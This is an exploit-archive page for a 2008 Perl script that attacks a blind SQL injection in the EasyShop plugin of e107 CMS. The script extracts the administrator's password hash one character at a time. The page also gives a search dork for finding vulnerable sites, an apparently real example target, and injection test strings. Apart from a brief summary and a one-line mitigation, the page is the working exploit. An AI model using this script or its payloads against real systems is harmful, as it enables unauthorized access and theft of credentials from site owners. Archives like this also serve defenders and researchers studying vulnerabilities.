header-logo
Suggest Exploit
vendor:
Plugin EasyShop
by:
StAkeR
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Plugin EasyShop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit

This exploit is used to gain access to the user_password from the e107_user table in the database of the e107 CMS. The exploit uses a blind SQL injection vulnerability in the Plugin EasyShop to gain access to the user_password. The exploit is written in Perl and uses the LWP::UserAgent module to send requests to the vulnerable URL.

Mitigation:

The user should update the Plugin EasyShop to the latest version.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# ------------------------------------------------------------
# e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit
# By StAkeR[at]hotmail[dot]it  
# Dork allinurl: e107_plugins/easyshop/easyshop.php
# Example http://www.clan-designs.co.uk
# easyshop/easyshop.php?choose_category=1&category_id= or 1=1
# easyshop/easyshop.php?choose_category=1&category_id= and 1=2
# ------------------------------------------------------------

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);

my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
my @chars = (48..57, 97..102); 
my $http = new LWP::UserAgent;

for(0..32)
{
   foreach $ord(@chars) 
   {
      $send = " or ascii(substring((select user_password from e107_user where user_id=1),$uid,1))=$ord/*";
      $send = uri_escape($send);
    
      $request = $http->get($host."/e107_plugins/easyshop/easyshop.php?choose_category=1&category_id=-1".$send);
    
     if($request->is_success and $request->content !~ /No products available/i)
     {
        $hash .= chr($ord); 
        $uid++;
     }
   }
}

if(defined $hash)
{
   print STDOUT "[+] MD5: $hash\n";
   exit;
}
else
{
   print STDOUT "[?] Exploit Failed!\n";
   exit;
}

# milw0rm.com [2008-10-27]